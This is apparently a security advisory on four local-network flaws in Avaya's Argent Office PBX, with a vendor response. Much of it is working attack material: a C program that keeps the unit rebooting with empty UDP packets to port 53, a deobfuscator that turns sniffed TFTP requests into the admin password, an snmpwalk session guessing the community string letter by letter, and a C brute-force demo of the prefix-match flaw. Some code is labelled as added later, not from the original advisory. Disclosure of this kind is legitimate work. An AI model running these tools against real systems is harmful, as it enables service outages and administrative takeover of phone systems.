The Argent Office branch of products (now known as the Network Alchemy line) from Avaya is a solution integrating a PBX, network connectivity, dial-on-demand networking and more. The product contains multiple security vulnerabilities that allow attackers to stop it from providing service, gain elevated privileges and modify its current configuration. All of these vulnerabilities are only exploitable from the local network (the system is designed for small offices), so they should not be much of a problem in general, but they may still pose a problem in some organizations or configurations.
Credit:
The information has been provided by Jacek Lipkowski and Russ Garrett.
1. Local denial of service:
Sending a UDP packet with no payload to port 53 causes the Argent Office to reboot. The unit comes back up very quickly, so to sustain a denial of service one needs to send such packets repeatedly.
Exploit:
/* argent_kill.c
(c) 2001 Jacek Lipkowski sq5bpf@acid.ch.pw.edu.pl
Reboots an Argent Office box by sending udp packets with no payload to port 53
usage: argent_kill ip_address
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
    struct sockaddr_in addr;
    struct hostent *host;
    int s;

    if (argc != 2) { fprintf(stderr, "usage: %s ip_address\n", argv[0]); exit(1); }
    s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if (s == -1) { perror("socket()"); exit(1); }
    host = gethostbyname(argv[1]);
    if (host == 0) { herror("gethostbyname"); exit(1); }
    memset(&addr, 0, sizeof(addr));
    memcpy(&addr.sin_addr, host->h_addr, host->h_length);
    addr.sin_port = htons(53);          /* the port that triggers the reboot */
    addr.sin_family = AF_INET;
    if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) == -1) { perror("connect()"); exit(1); }
    /* one zero-length datagram per second: each one reboots the unit,
       so keep sending to keep it down */
    for (;;)
    {
        send(s, NULL, 0, 0); sleep(1); printf("."); fflush(stdout);
    }
    close(s);                           /* not reached */
    return 0;
}
2. Easily decryptable configuration password
Argent Office is configured over a protocol resembling TFTP. For example, to reboot a unit one must fetch the following file via TFTP:
nasystem/rebootwhenfree/00e007002666/password//
Where 00e007002666 is the MAC address of the unit and password is the obfuscated password. Since this packet is easily sniffed and the obfuscation algorithm never changes, anyone with a sniffer on the LAN can obtain administrative privileges. The obfuscation mechanism is rather simple, as the following example demonstrates:
Exploit:
/* argent_obfuscate.c
(c) 2001 Jacek Lipkowski sq5bpf@acid.ch.pw.edu.pl
Demonstrates how the password obfuscation mechanism works in argent office products */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv)
{
    int i;
    unsigned char buf[32];

    if (argc != 2 || strlen(argv[1]) >= sizeof(buf)) {
        fprintf(stderr, "usage: %s password (at most %zu characters)\n", argv[0], sizeof(buf) - 1);
        exit(1);
    }
    strcpy((char *)buf, argv[1]);
    /* each byte is shifted by 0x11 and then back by its position */
    for (i = 0; i < (int)strlen(argv[1]); i++)
        printf("0x%2.2X ", buf[i] + 0x11 - i);
    printf("\n");
    return 0;
}
Showing the hex values for the password 'idiocy':
~$ ./argent_obfuscate idiocy
0x7A 0x74 0x78 0x7D 0x70 0x85
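The attacker's side of this is the inverse transform: take the bytes recovered from a sniffed request and undo the shift. The following program is an added example, not part of the original advisory or Avaya's code. It implements both directions (out[i] = in[i] + 0x11 - i and in[i] = out[i] - 0x11 + i) and checks them against the 'idiocy' vector above. The advisory does not say how the obfuscated bytes are encoded inside the TFTP filename, so the program simply takes them as hex values on the command line; that input format is an assumption.

```c
/* argent_deobfuscate.c  (added example, not from the advisory)
 * Inverts the Argent Office password obfuscation: in[i] = out[i] - 0x11 + i.
 * usage: argent_deobfuscate 0x7A 0x74 0x78 0x7D 0x70 0x85
 * Input as hex bytes on the command line is an assumption for this demo. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAXPW 31

/* Forward transform from the advisory; arithmetic is modulo 256.
 * Returns the number of bytes written, 0 if the output buffer is too small. */
size_t argent_obfuscate(const char *pw, unsigned char *out, size_t outlen)
{
    size_t n = strlen(pw);
    if (n > outlen) return 0;
    for (size_t i = 0; i < n; i++)
        out[i] = (unsigned char)((unsigned char)pw[i] + 0x11 - i);
    return n;
}

/* Inverse transform: recover the clear-text password from obfuscated bytes.
 * Returns the password length, 0 if it would not fit (including the NUL). */
size_t argent_deobfuscate(const unsigned char *ob, size_t n, char *pw, size_t pwlen)
{
    if (n + 1 > pwlen) return 0;
    for (size_t i = 0; i < n; i++)
        pw[i] = (char)(ob[i] - 0x11 + i);
    pw[n] = '\0';
    return n;
}

/* Round-trip check against the vector printed in the advisory. Returns 1 on success. */
int argent_selftest(void)
{
    static const unsigned char expect[] = {0x7A, 0x74, 0x78, 0x7D, 0x70, 0x85};
    unsigned char ob[MAXPW];
    char pw[MAXPW + 1];

    if (argent_obfuscate("idiocy", ob, sizeof ob) != 6) return 0;
    if (memcmp(ob, expect, 6) != 0) return 0;
    if (argent_deobfuscate(ob, 6, pw, sizeof pw) != 6) return 0;
    if (strcmp(pw, "idiocy") != 0) return 0;
    if (argent_deobfuscate(ob, 6, pw, 6) != 0) return 0;   /* buffer too small */
    return 1;
}

int main(int argc, char **argv)
{
    unsigned char ob[MAXPW];
    char pw[MAXPW + 1];
    size_t n = 0;

    if (argc < 2 || argc - 1 > MAXPW) {
        fprintf(stderr, "usage: %s 0xHH 0xHH ...   (obfuscated bytes)\n", argv[0]);
        return 1;
    }
    /* strtoul with base 16 accepts an optional 0x prefix */
    for (int i = 1; i < argc; i++)
        ob[n++] = (unsigned char)strtoul(argv[i], NULL, 16);
    argent_deobfuscate(ob, n, pw, sizeof pw);
    printf("%s\n", pw);
    return 0;
}
```

Running it on the six bytes shown above prints idiocy; because the transform is a fixed per-position offset with no key, every captured request yields the password with no more work than this.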
3. SNMP handling
The software does SNMP authentication via something similar to:
if (strncmp(n,c,strlen(n))==0) { ok, valid community}
Where c is the stored community string and n is the community string received from the network.
Because only strlen(n) bytes are compared, a community string of length 0 in the packet always authenticates, and any correct prefix of the real community string is accepted as well.
~$ snmpwalk 192.168.1.234 "" system.sysDescr.0
system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)
This allows an attacker to guess the community string character by character.
Example:
For guessing the first letter:
~$ snmpwalk 192.168.1.234 a system.sysDescr.0
Timeout: No Response from 192.168.1.234
[the first letter is not a]
[several combinations later, is it p?]
~$ snmpwalk 192.168.1.234 p system.sysDescr.0
system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)
[ok we have the first letter, lets go for the second]
~$ snmpwalk 192.168.1.234 pa system.sysDescr.0
Timeout: No Response from 192.168.1.234
[the second letter is not a]
[several combinations later, is it r?]
~$ snmpwalk 192.168.1.234 pr system.sysDescr.0
system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)
Etc...
After a small number of combinations we find that the community is 'private'.
While not much is gained via SNMP itself, the community may be a company standard, and knowing it may open other doors.
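To make the prefix-match flaw concrete, the following C program is an added example (not the firmware's code and not from the advisory). It puts the check as the advisory describes it next to a fixed version, and drives the vulnerable one with the same one-character-at-a-time strategy as the snmpwalk session above. The device is replaced by an in-process oracle that answers 1 for "reply" and 0 for "timeout", and the target community 'private' and the guessing alphabet are constructed for the demo; on a real network each oracle call would be one SNMP GET.

```c
/* snmp_prefix_oracle.c  (added example, not from the advisory or Avaya) */
#include <stdio.h>
#include <string.h>

/* The check the advisory attributes to the firmware: only strlen(n) bytes
 * are compared, so "" and every correct prefix of c are accepted. */
int vuln_community_ok(const char *n, const char *c)
{
    return strncmp(n, c, strlen(n)) == 0;
}

/* Fixed check: lengths must match and every byte of the stored community is
 * compared, with no early exit, so neither a prefix nor timing leaks anything. */
int safe_community_ok(const char *n, const char *c)
{
    size_t nl = strlen(n), cl = strlen(c);
    unsigned char diff = (unsigned char)(nl != cl);
    for (size_t i = 0; i < cl; i++) {
        unsigned char nb = (i < nl) ? (unsigned char)n[i] : 0;
        diff |= (unsigned char)(nb ^ (unsigned char)c[i]);
    }
    return diff == 0;
}

typedef int (*oracle_fn)(const char *guess);

/* Constructed target: stands in for the device answering SNMP requests. */
static const char *device_community = "private";
static int vuln_device(const char *g) { return vuln_community_ok(g, device_community); }
static int safe_device(const char *g) { return safe_community_ok(g, device_community); }

/* Recover the community one character at a time, as in the snmpwalk session.
 * Returns the number of oracle queries; out is left empty when the oracle
 * rejects "" (no prefix signal, e.g. the fixed check). */
int recover_community(oracle_fn oracle, char *out, size_t outlen)
{
    static const char alphabet[] = "abcdefghijklmnopqrstuvwxyz0123456789";
    size_t len = 0;
    int queries = 1;

    out[0] = '\0';
    if (!oracle(out)) return queries;           /* empty string rejected: no oracle */
    while (len + 1 < outlen) {
        int found = 0;
        for (const char *a = alphabet; *a; a++) {
            out[len] = *a; out[len + 1] = '\0';
            queries++;
            if (oracle(out)) { found = 1; break; }
        }
        if (!found) { out[len] = '\0'; break; }  /* nothing extends it: complete */
        len++;
    }
    return queries;
}

/* Run the attack against the vulnerable (fixed == 0) or fixed check. */
int attack_demo(int fixed, char *out, size_t outlen)
{
    return recover_community(fixed ? safe_device : vuln_device, out, outlen);
}

/* Returns 1 if the vulnerable check leaks 'private' in 128 queries
 * (1 + 91 per-position hits + 36 final misses) and the fixed check leaks nothing. */
int snmp_selftest(void)
{
    char got[32];
    if (attack_demo(0, got, sizeof got) != 128 || strcmp(got, "private") != 0) return 0;
    if (attack_demo(1, got, sizeof got) != 1 || got[0] != '\0') return 0;
    return 1;
}

int main(void)
{
    char got[32];
    int q = attack_demo(0, got, sizeof got);
    printf("vulnerable check: recovered '%s' in %d queries\n", got, q);
    q = attack_demo(1, got, sizeof got);
    printf("fixed check: recovered '%s' in %d queries\n", got, q);
    return 0;
}
```

With a 36-character alphabet the vulnerable check gives up a seven-character community in 128 queries instead of the 36^7 a correct comparison would force; the fixed check answers "timeout" to the empty string, so the search never gets started.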
4. Broadcast TFTP requests
The system in its default configuration requests a file called HoldMusic via TFTP from the broadcast address. Anyone on the local network can serve this file and change the company's music-on-hold tune to something else.
Vendor response:
1) Fixed in Argent Branch/Office 2.2.60
2) Password can be cracked. Hacker needs to be on local LAN.
The who-is packet can be filtered by use of a switching device placed directly between the PBX and all non-trusted users, or by ensuring the Manager only resides on the local subnet and all users of this local subnet are "trusted".
3) The SNMP community string used for the Alchemy/IP Office range of Equipment is [Public]. This is hard coded and cannot be changed. So no real threat here, as if other devices on Network are configurable via SNMP (which the Alchemy/IP Office isn't) then they should be set to the customers real community string and NOT [Public].
4) Yes, the TFTP request for Hold Music uses broadcast address 255.255.255.255. This will only reach PCs on the local subnet if on a routed network. If someone on your local net has a TFTP Server or Manager running then the IT guy should know about it. If you feel it is a problem, place a switching device on the local subnet so only the PC required to respond to this broadcast can see it. Down to administration of the local LAN, I would suggest.